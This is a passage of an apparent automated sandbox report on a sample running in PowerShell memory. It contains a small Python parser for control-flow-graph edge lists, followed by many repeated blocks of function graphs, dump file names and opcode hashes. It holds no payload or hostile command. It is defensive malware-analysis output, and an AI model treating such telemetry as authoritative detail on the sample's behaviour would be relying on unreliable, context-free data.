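    entry = next(iter(cfg.blocks.values()))
    by_site: dict[int, set[int]] = {}
    for b in cfg.blocks.values():
        for t in b.calls:
            by_site.setdefault(b.start, set()).add(t)
    return {
        "entry": entry.start,
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "apis": sorted({a for b in cfg.blocks.values() for a in b.apis}),
        "call_targets": sorted({t for s in by_site.values() for t in s}),
        "self_loops": sorted(a for a, b in cfg.edges if a == b),
        "multi_target_sites": {s: sorted(t) for s, t in by_site.items() if len(t) > 1},
    }


# Constructed samples: opening tokens of the bd8a78 list (trimmed) and the
# complete CreateActCtxA list (befe70) from this report.
SAMPLE_BD8A78 = ("control_flow_graph 390 bd8a78-bd8ae4 395 bd8aea-bd8afa 390->395 "
                 "396 bd9257-bd9270 390->396 401 bd8afc 395->401 398 bd9280 396->398 "
                 "403 bd9281 398->403 403->403 401->396 435 bd8f82-bd8fbc "
                 "550 bd8fbf call bd934c 435->550 551 bd8fbf call bd9348 435->551 "
                 "552 bd8fbf call bd9350 435->552")
SAMPLE_BEFE70 = ("control_flow_graph 659 befe70-beff31 CreateActCtxA 661 beff3a-beff94 "
                 "659->661 662 beff33-beff39 659->662 669 beff96-beff99 661->669 "
                 "670 beffa3-beffa7 661->670 662->661 669->670 671 beffb8 670->671 "
                 "672 beffa9-beffb5 670->672 672->671")

if __name__ == "__main__":
    for name, text in (("bd8a78", SAMPLE_BD8A78), ("befe70", SAMPLE_BEFE70)):
        s = summarize(parse_cfg(text))
        print(f"{name}: entry=0x{s['entry']:08X} blocks={s['blocks']} edges={s['edges']} "
              f"apis={s['apis']} self_loops={s['self_loops']} "
              f"ambiguous_call_sites={[hex(a) for a in s['multi_target_sites']]}")
```

Feed it the full edge lists from this page to get the same summary per function; a site with several listed targets means the plugin could not pin the call to one destination, which is worth a manual look in the dump before trusting any cross-reference built from these graphs.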

Control-flow Graph
control_flow_graph 973 bd9373-bd9374 974 bd934d-bd9362 973->974 975 bd9376-bd944f 973->975 1037 bd9365 call bd95a9 974->1037 1038 bd9365 call bd937b 974->1038 1039 bd9365 call bd95ca 974->1039 1040 bd9365 call bd954a 974->1040 1041 bd9365 call bd9626 974->1041 1042 bd9365 call bd95c1 974->1042 1043 bd9365 call bd9373 974->1043 994 bd95cf-bd95e1 975->994 995 bd9455-bd948e 975->995 979 bd9367-bd9369 996 bd9639-bd9642 994->996 997 bd95e3-bd95ec 994->997 1008 bd958c-bd95ae 995->1008 1009 bd9494-bd94a4 995->1009 999 bd95ee-bd9609 997->999 1000 bd9645-bd964f 997->1000 1033 bd960c call bd969d 999->1033 1034 bd960c call bd9698 999->1034 1035 bd960c call bd96a0 999->1035 1036 bd960c call bd9690 999->1036 1004 bd9612-bd9637 1004->996 1004->997 1013 bd95be 1008->1013 1014 bd95b0-bd95b6 1008->1014 1015 bd94aa-bd94b9 1009->1015 1016 bd9550-bd9586 call bd9350 1009->1016 1013->994 1014->1013 1015->1016 1020 bd94bf-bd9501 1015->1020 1016->1008 1016->1009 1024 bd9503-bd9516 1020->1024 1025 bd9532-bd9548 1020->1025 1030 bd9518-bd951f 1024->1030 1031 bd9521-bd9530 1024->1031 1025->1016 1030->1025 1031->1024 1031->1025 1033->1004 1034->1004 1035->1004 1036->1004 1037->979 1038->979 1039->979 1040->979 1041->979 1042->979 1043->979
Strings
Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID: T8o
• API String ID: 0-2079612026
• Opcode ID: e588b71101e8813e3e2ee205dd3f67e1fd5125d1af1160b107615593ac9a92cd
• Instruction ID: 9493dded70890b3c1837dee1f4fe188f5ae51fe8fa83dd269860d3b56d04e7f9
• Opcode Fuzzy Hash: e588b71101e8813e3e2ee205dd3f67e1fd5125d1af1160b107615593ac9a92cd
• Instruction Fuzzy Hash: 23815234A002099FDB05DFE4D9515AEBBF2EF84304F20856AE806EB354EB71DD46CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1102 bd6a40-bd6a4e 1103 bd6a68-bd6abf 1102->1103 1104 bd6a50 1102->1104 1112 bd6ac8-bd6ad5 1103->1112 1119 bd6ac2 call bd6b48 1103->1119 1120 bd6a50 call bd6a3f 1104->1120 1121 bd6a50 call bd6aa8 1104->1121 1122 bd6a50 call bd6a40 1104->1122 1106 bd6a56-bd6a5d call bd5c20 1109 bd6a62-bd6a65 1106->1109 1113 bd6b39-bd6b42 1112->1113 1114 bd6ad7 1112->1114 1115 bd6ada-bd6b26 1114->1115 1117 bd6b28-bd6b32 1115->1117 1118 bd6b33-bd6b37 1115->1118 1118->1113 1118->1115 1119->1112 1120->1106 1121->1106 1122->1106
Strings
Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID: (q
• API String ID: 0-2781080665
• Opcode ID: 18e071752e13a932459ea26bdeb695b546bf9f1170efb064930aa864dbaa8a93
• Instruction ID: a0a0e0c32dc71dfb35c6c53f706965b292b53cfe5a2e74101c6bf0bc08f8e33f
• Opcode Fuzzy Hash: 18e071752e13a932459ea26bdeb695b546bf9f1170efb064930aa864dbaa8a93
• Instruction Fuzzy Hash: 76318E31E006098FCB00EFA9D8505EEBBF0EF89310B14866BD549F7251EB30A941CBA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1123 bd3218-bd3255 call bd2d74 1127 bd325a-bd325c 1123->1127 1128 bd325e-bd329d 1127->1128 1129 bd32d5-bd3310 1127->1129 1137 bd329f-bd32c8 1128->1137 1138 bd32ce-bd32d4 1128->1138 1137->1138
Strings
Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID: 3
• API String ID: 0-1842515611
• Opcode ID: 3ec5b25faabc1c7e27fd2644310b8e847c6523aadf58f3f0d121abb688f926b2
• Instruction ID: 388f2c74643837659a7ff053599f151bd40c438ec882d8694f3b96e0dc6b67a7
• Opcode Fuzzy Hash: 3ec5b25faabc1c7e27fd2644310b8e847c6523aadf58f3f0d121abb688f926b2
• Instruction Fuzzy Hash: 582137327042404FCB05EB79C80549ABBF6AF81310B1489AED406DB362EB71DD09CB92
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1141 bdb540-bdb7be 1172 bdb7c9-bdb7dd 1141->1172 1173 bdb7e7-bdb7e9 1172->1173 1174 bdb7f0 1173->1174 1175 bdb7fa-bdb8b5 1174->1175 1183 bdb8c0-bdb8d4 1175->1183 1184 bdb8de-bdb900 1183->1184 1188 bdbaac-bdbabf 1184->1188 1189 bdb906-bdb9d1 1184->1189 1190 bdbac6 1188->1190 1205 bdb9d7-bdb9ee 1189->1205 1206 bdbac1 1189->1206 1192 bdbac7 1190->1192 1192->1192 1205->1206 1208 bdb9f4-bdbaa6 1205->1208 1206->1190 1208->1188 1208->1189
Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb68f4f1a36d4a1f911ca1c36209767868b9bb14f8ae7677e27d6df24bf3ed8f
• Instruction ID: bfcc0c3cdadb63e1e2a718bc53aca0c0ca4049ecdb100edf54c5e0672e334909
• Opcode Fuzzy Hash: bb68f4f1a36d4a1f911ca1c36209767868b9bb14f8ae7677e27d6df24bf3ed8f
• Instruction Fuzzy Hash: 22C19374B102158FDB54AB64C851BAEBBB7EFC8300F208069E40AAB395DF755D46CF91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2ce62d240f98f053e6d3b0f3f5cdc1e5744c2b0b7c5d45ed162dd1e9cbc3a41
• Instruction ID: 3921ef3132f420396e8db652f6c185737bc5f113228cd12b333be4be52c212ac
• Opcode Fuzzy Hash: a2ce62d240f98f053e6d3b0f3f5cdc1e5744c2b0b7c5d45ed162dd1e9cbc3a41
• Instruction Fuzzy Hash: 19C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23724bfb6895563e8c4bf3836bd655d3f16d6f04b7409480139fd573d990e6f2
• Instruction ID: fe669ea6ba98f9b54222f45ee6be5a5667c964fd4b025f187a4d4951843b3320
• Opcode Fuzzy Hash: 23724bfb6895563e8c4bf3836bd655d3f16d6f04b7409480139fd573d990e6f2
• Instruction Fuzzy Hash: 9AC19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fd71a14e80450909a085e95c7c2ddf22caa0c2db61c41f551e93ad811e6a504
• Instruction ID: 70db3a5851bbb580de090d92635ad77fe4b0136a36e2935af1889f2c94356031
• Opcode Fuzzy Hash: 9fd71a14e80450909a085e95c7c2ddf22caa0c2db61c41f551e93ad811e6a504
• Instruction Fuzzy Hash: 64C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8c734b8d854061985d5759a4712cae71476f5f3048dd46fb9b8b104f725341c2
                                                                                                                                                                        • Instruction ID: 78a95b15274c68328ca30d2e56a284edbe826d6311183a56348a3a53186fa780
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c734b8d854061985d5759a4712cae71476f5f3048dd46fb9b8b104f725341c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 23C19274B102158FDB54AB64C851BAEBBB7EFC8300F208069E80AAB395DF755D46CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d254447e5bef130bea9ae8134a77a1b25e5ae317d830d1b140539fc393071c59
                                                                                                                                                                        • Instruction ID: 93d6b9aa07f60a0096716a1b6d92bd4524eb02c214df83fbafc4123f9ec26501
                                                                                                                                                                        • Opcode Fuzzy Hash: d254447e5bef130bea9ae8134a77a1b25e5ae317d830d1b140539fc393071c59
                                                                                                                                                                        • Instruction Fuzzy Hash: E1618E39B001048FDB45EFA9D451A6E7FF7EBC9604B248019E506EB388EF34DD428B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8fa5072acb19234f3689f8dda56d020f2f5db172aedd34cece38a292515afbcf
                                                                                                                                                                        • Instruction ID: cbb5f270f643c02607ff80d8b9c09ac9fcbd0a57edda085b97bf9c53c526ff02
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fa5072acb19234f3689f8dda56d020f2f5db172aedd34cece38a292515afbcf
                                                                                                                                                                        • Instruction Fuzzy Hash: 94518239B00104CF9B45EFA8D455A6E7BF7EBC9305B148015E506AB388EF34DD428F92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 46a6dfec3ee1875a42288fe397a859977cfcf751575bceed81df6bd06cf07295
                                                                                                                                                                        • Instruction ID: 7bc789934db6347fb03d4b312d09915d6f3a2a37ba631eaef6c9bffd63e524cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 46a6dfec3ee1875a42288fe397a859977cfcf751575bceed81df6bd06cf07295
                                                                                                                                                                        • Instruction Fuzzy Hash: DF517039B001048FDB45EFA8D551A6E7FF7EBC9214B148019E906AB388EF34DD428B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d0c33b642a6a7ead7dd0b05b9e7b212b59436232bbd217b0dcbd661169f1949c
                                                                                                                                                                        • Instruction ID: 779160e817520d72f58b8ba29f8b1a33ad15f4948c813262cfb633e2e8dcf2d1
                                                                                                                                                                        • Opcode Fuzzy Hash: d0c33b642a6a7ead7dd0b05b9e7b212b59436232bbd217b0dcbd661169f1949c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C516C31A047099FCB15DFA9C8506DDFBF1EF89300F1586AAE449AB265FB709D85CB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4b550adce99740c354006652e29d89d3c4d80be7b24b64f38c29365c7bfea52b
                                                                                                                                                                        • Instruction ID: d95cdfacb84fcc8b1c6bdb2d1abe8761db70c0993ff305ef604f1539c1efc575
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b550adce99740c354006652e29d89d3c4d80be7b24b64f38c29365c7bfea52b
                                                                                                                                                                        • Instruction Fuzzy Hash: BC41BB34A10104CBEB00DB99D945BAEF7F3EBC9310F6481AAE106AB395EF755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6fa572def8996f4c83801521b234e4734f470bafda9ba0d499f2defb7ef2d40c
                                                                                                                                                                        • Instruction ID: 04fdf46833cf76864b8043018ab41f513117c9dfe9c106bb9c853e855a04f407
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fa572def8996f4c83801521b234e4734f470bafda9ba0d499f2defb7ef2d40c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C41B934A00104CBEB04DF99D945BAAF7F3FBC9310F2481ABE002AB795EB755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2908d392e3d76c4556ab86dbb38b28dc6932bfe7e60dd9d36de127bf1fac0ad3
                                                                                                                                                                        • Instruction ID: 37aa7feb14d93a1f9f20949ab2bf231cdf81b3d6c451fa7caf988422af2e89d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2908d392e3d76c4556ab86dbb38b28dc6932bfe7e60dd9d36de127bf1fac0ad3
                                                                                                                                                                        • Instruction Fuzzy Hash: CA41BB34A00104CBEB00CF99D945BAAF7F3EBC9310F2481A7E002AB395EB755C458B81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a3019b191258ff16a42f7455a780fb833f674b97022947d82c77686e10381ca9
                                                                                                                                                                        • Instruction ID: a3e7adb02353f2291f64700c55f6651704a16cde6beb854d32c8dfcd286596a0
                                                                                                                                                                        • Opcode Fuzzy Hash: a3019b191258ff16a42f7455a780fb833f674b97022947d82c77686e10381ca9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41A934A10104CBEB04DB99D945BAAF7F3EBC9310F2481AAE006AB795EB755C458B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3689b66123c4571fa20eb7a74e84e1c6ab995bcdb6f8ac2df9fac3989c18a58d
                                                                                                                                                                        • Instruction ID: 78b7d6ad51ef629682c731a4040ea5194ee6b364f0bff6917cf07072b572e895
                                                                                                                                                                        • Opcode Fuzzy Hash: 3689b66123c4571fa20eb7a74e84e1c6ab995bcdb6f8ac2df9fac3989c18a58d
                                                                                                                                                                        • Instruction Fuzzy Hash: 76413571D102198FCF04DFA9D998AAEBBF5EF88300F14856AD805F7360EB745904CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9d42ee6f39a47efa3830de1e890993a77ef11092cbd78defd62d037cf10eac73
                                                                                                                                                                        • Instruction ID: f8aaa5ecea35829056341af18e507bea5d6fda1032833f0ff12e706bd8060f36
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d42ee6f39a47efa3830de1e890993a77ef11092cbd78defd62d037cf10eac73
                                                                                                                                                                        • Instruction Fuzzy Hash: 8841EFB1D002089BDB20CFA9C984ADDFBF5BF89700F24846AD409BB311E7756A49CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fca86715803cce45eb300519af6a5d9aca421d1c4e1d5ff5f5b328f3f53e7ef6
                                                                                                                                                                        • Instruction ID: 004fa8e7e1f63b90cdde7ee2f58a8ef982f97dae55b7925739e4c7a76c70dd04
                                                                                                                                                                        • Opcode Fuzzy Hash: fca86715803cce45eb300519af6a5d9aca421d1c4e1d5ff5f5b328f3f53e7ef6
                                                                                                                                                                        • Instruction Fuzzy Hash: BB31E1B0D042089FDB24CF9AC988BDEFBF5EB48710F24845AE409A7350EBB55844CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522635799.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_aed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b95023782bb2025e4144f4c6728f0bca21c0b6af723051f2764943791135de8c
                                                                                                                                                                        • Instruction ID: 0d56db77a344bfbad0c4132a711bb991658b1d3cfab07364fa7b78958edb69ac
                                                                                                                                                                        • Opcode Fuzzy Hash: b95023782bb2025e4144f4c6728f0bca21c0b6af723051f2764943791135de8c
                                                                                                                                                                        • Instruction Fuzzy Hash: F1210171204280EFDB15DF14D9C4B26BFA6FB84724F28C569E8060B246C336D84ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522536874.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_add000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0af9251057bcb76e91c8818fda029b1a9029d5a21e258aea2a8446b7e7f0ef2c
                                                                                                                                                                        • Instruction ID: ebc613dfb365d598dd441551632a0f2e3c1ba5c173073bac9845416081919e4a
                                                                                                                                                                        • Opcode Fuzzy Hash: 0af9251057bcb76e91c8818fda029b1a9029d5a21e258aea2a8446b7e7f0ef2c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0521B375604240AFDB05EF14D9C4B26BBA5FB84714F24C9AFE84B4F381C336E846CAA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b23a6db58373fc8d2ad8e94494a6fa6a4af9370de4bf5ca15979c9bfc1a88f35
                                                                                                                                                                        • Instruction ID: 98f2df8676e6593e22a516d2cf4b7e4fa8c1e7331d6fe89091cb0eb3778f76a2
                                                                                                                                                                        • Opcode Fuzzy Hash: b23a6db58373fc8d2ad8e94494a6fa6a4af9370de4bf5ca15979c9bfc1a88f35
                                                                                                                                                                        • Instruction Fuzzy Hash: 0611D6357251008FD705AB69D892B6A7BE7E7C9754B2480A7F00ACB385DF349C428FD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 63c17d5e26af39f0cdb9f42317243d523faca08c84f123d9d2e8304cc0fa6081
                                                                                                                                                                        • Instruction ID: 7d7ee710189fb0717df3d10b0d5f93494b5aa2ef415edbae022a75842781ebdb
                                                                                                                                                                        • Opcode Fuzzy Hash: 63c17d5e26af39f0cdb9f42317243d523faca08c84f123d9d2e8304cc0fa6081
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A1190393151048BD750EB69F851B667BEAEBC6320F248172E115C7798EF70AC46CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4f345d7f87e77b92d5507ddea170be9c1b2e7f4cbbe81d1fe2c484e1cd971334
                                                                                                                                                                        • Instruction ID: 22fbee8e24a73122b60cdabbf9e7e510bbe47ff52a5d53a31f9dd1cb5551e8a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f345d7f87e77b92d5507ddea170be9c1b2e7f4cbbe81d1fe2c484e1cd971334
                                                                                                                                                                        • Instruction Fuzzy Hash: E411BF397251008BD705ABA9E882B6A7BE7E7C9754F248066E00A9B385DF349C428FD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522635799.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_aed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 33ef2f7d2ced2074b554dc60738cf1daefe86617af99566afae56e757c5c11c1
                                                                                                                                                                        • Instruction ID: 2878450513db196fba089bc15b2db44fddb8404eaa8a386f7e9db579ad1182aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 33ef2f7d2ced2074b554dc60738cf1daefe86617af99566afae56e757c5c11c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0921BE750093C08FCB13CF20D994B16BF71EB86314F2985EAD8458B657C33AD80ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
